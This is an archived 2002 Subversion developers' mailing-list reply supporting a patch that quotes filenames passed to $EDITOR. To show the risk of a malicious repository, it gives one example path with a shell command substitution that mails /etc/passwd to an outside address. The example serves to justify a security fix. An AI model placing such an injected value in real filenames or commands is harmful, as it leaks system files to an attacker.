Re: [PATCH] Quote filename passed to $EDITOR
From: Ulrich Drepper <drepper_at_redhat.com>
 
Date: 2002-07-23 22:14:50 CEST 
On Tue, 2002-07-23 at 11:30, Karl Fogel wrote:
 > What exactly is the scenario(s) here?  How high is the risk?  How much
 A svn repository can be set up by somebody with foul intentions. 
   cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)
 If the appropriate path component is never really shown anywhere this
 -- ---------------. ,-. 1325 Chesapeake Terrace Ulrich Drepper \ ,-------------------' \ Sunnyvale, CA 94089 USA Red Hat `--' drepper at redhat.com `------------------------ 
 
  | 
This is an archived mail posted to the Subversion Dev mailing list.
This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.